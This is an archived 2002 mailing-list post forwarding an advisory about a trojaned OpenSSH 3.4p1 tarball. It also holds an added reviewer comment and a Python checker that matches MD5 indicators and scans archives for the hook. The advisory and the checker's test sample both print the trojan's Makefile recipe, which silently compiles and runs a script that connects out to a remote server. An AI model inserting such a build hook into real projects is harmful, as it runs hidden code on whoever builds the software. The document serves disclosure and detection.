[Linux-Anyway] openssh-3.4p1.tar.gz distribution recently trojaned

  • From: Godwin Stewart <gstewart@xxxxxxxxxxx>
  • To: Beginning With Linux <BeginningWithLinux@xxxxxxxxxxxxxxx>,Linux list <linux@xxxxxxxxxxxxxxx>,Linux Newbies <LINUX_Newbies@xxxxxxxxxxxxxxx>,Linux-Anyway <Linux-Anyway@xxxxxxxxxxxxx>
  • Date: Thu, 1 Aug 2002 15:41:04 +0200

X-POSTED to:

BeginningWithLinux@xxxxxxxxxxxxxxx
linux@xxxxxxxxxxxxxxx
LINUX_Newbies@xxxxxxxxxxxxxxx
Linux-Anyway@xxxxxxxxxxxxx



From
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

----- Forwarded message from Edwin Groothuis <edwin@xxxxxxxxxxx> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@xxxxxxxxxxx>
To: incidents@xxxxxxxxxxxxxxxxx
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org
(and probably all its mirrors now) is trojaned:

     ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@xxxxxxxxxxx and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
  all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
../bf-test.out &
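
Review bot: the recipe added under `all:` executes generated code at build time and should be rejected. It compiles bf-test.c, runs it, and feeds the output to `sh`, so code shipped in the tarball runs as whoever invokes `make`, before anything is installed. The leading `@` stops make from echoing the command and the trailing `&` backgrounds it, so the step leaves no trace in the build output. A compat-library `all:` target has no reason to run a generated script.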

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
     MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
     MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

-- 
Seen in the classified ads:
NICE PARACHUTE: NEVER OPENED - USED ONCE
 ____________________________________________
| G. Stewart   --   gstewart@xxxxxxxxxxxxxxx |
|                   gstewart@xxxxxxxxxxx     |
|--------------------------------------------|
| Linux User Group de Touraine               |
|                http://www.lug-touraine.org |
 ____________________________________________
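
A check built from the two indicators in the forwarded report, as an added example that is not part of the original post: it classifies a tarball by the MD5 digests quoted above and inspects the archive, without extracting it to disk, for the bf-test build hook. The function names, the regex and the constructed sample archive are assumptions of this example.

```python
import hashlib
import io
import re
import tarfile

# MD5 digests exactly as published in the report above.
KNOWN_GOOD_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"
TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"
# Assumed pattern: any indented recipe line that mentions bf-test.
HOOK = re.compile(rb"^[ \t]+.*bf-test", re.M)

def classify_digest(data):
    """Compare the archive's MD5 with the two digests from the report."""
    digest = hashlib.md5(data).hexdigest()
    if digest == KNOWN_GOOD_MD5:
        return "known-good"
    if digest == TROJANED_MD5:
        return "trojaned"
    return "unknown"

def find_build_hooks(data):
    """List members that carry the hook; nothing is extracted or executed."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            base = member.name.rsplit("/", 1)[-1]
            if base == "bf-test.c":
                hits.append(member.name)
            elif base == "Makefile.in" and HOOK.search(tar.extractfile(member).read()):
                hits.append(member.name)
    return hits

def make_sample(trojaned):
    """Constructed test archive, not the real distribution."""
    makefile = b"all: libopenbsd-compat.a\n"
    if trojaned:
        makefile += b"\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ../bf-test.out &\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("openssh-3.4p1/openbsd-compat/Makefile.in")
        info.size = len(makefile)
        tar.addfile(info, io.BytesIO(makefile))
    return buf.getvalue()

if __name__ == "__main__":
    for flag in (False, True):
        sample = make_sample(flag)
        print(flag, classify_digest(sample), find_build_hooks(sample))
```

MD5 is used only because those are the digests the report published. An "unknown" result with no hooks means the file matches neither indicator, not that it is clean.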